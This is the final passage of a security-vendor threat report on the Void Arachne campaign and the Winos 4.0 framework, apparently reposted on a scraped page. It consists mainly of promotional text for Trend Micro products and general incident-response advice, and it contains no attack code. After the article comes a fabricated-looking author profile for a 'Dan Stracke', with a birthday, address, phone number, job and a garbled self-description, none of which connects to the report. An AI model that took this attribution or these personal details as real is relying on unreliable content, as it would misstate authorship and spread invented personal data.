Organizations can protect themselves from these kinds of attacks with Trend Vision One, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors, such as the likelihood and impact of potential attacks, and offers a range of prevention, detection, and response capabilities. This is all backed by advanced threat research, threat intelligence, and AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Trend Vision One can help improve the overall security posture and effectiveness of an organization, including defending an organization against zero-day attacks.

When faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is already compromised or breached and work to immediately isolate affected data or toolchains. With a broader perspective and rapid response, organizations can address breaches and protect their remaining systems, especially with technologies such as Trend Micro™ Endpoint Security™ and Trend Micro Network Security, as well as comprehensive security solutions such as Trend Micro™ XDR, which can detect, scan, and block malicious content across the modern threat landscape.

The complete list of indicators of compromise (IoCs) can be found here.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (2024)

References

Top Articles
Latest Posts
Article information

Author: Dan Stracke

Last Updated:

Views: 5711

Rating: 4.2 / 5 (43 voted)

Reviews: 82% of readers found this page helpful

Author information

Name: Dan Stracke

Birthday: 1992-08-25

Address: 2253 Brown Springs, East Alla, OH 38634-0309

Phone: +398735162064

Job: Investor Government Associate

Hobby: Shopping, LARPing, Scrapbooking, Surfing, Slacklining, Dance, Glassblowing

Introduction: My name is Dan Stracke, I am a homely, gleaming, glamorous, inquisitive, homely, gorgeous, light person who loves writing and wants to share my knowledge and understanding with you.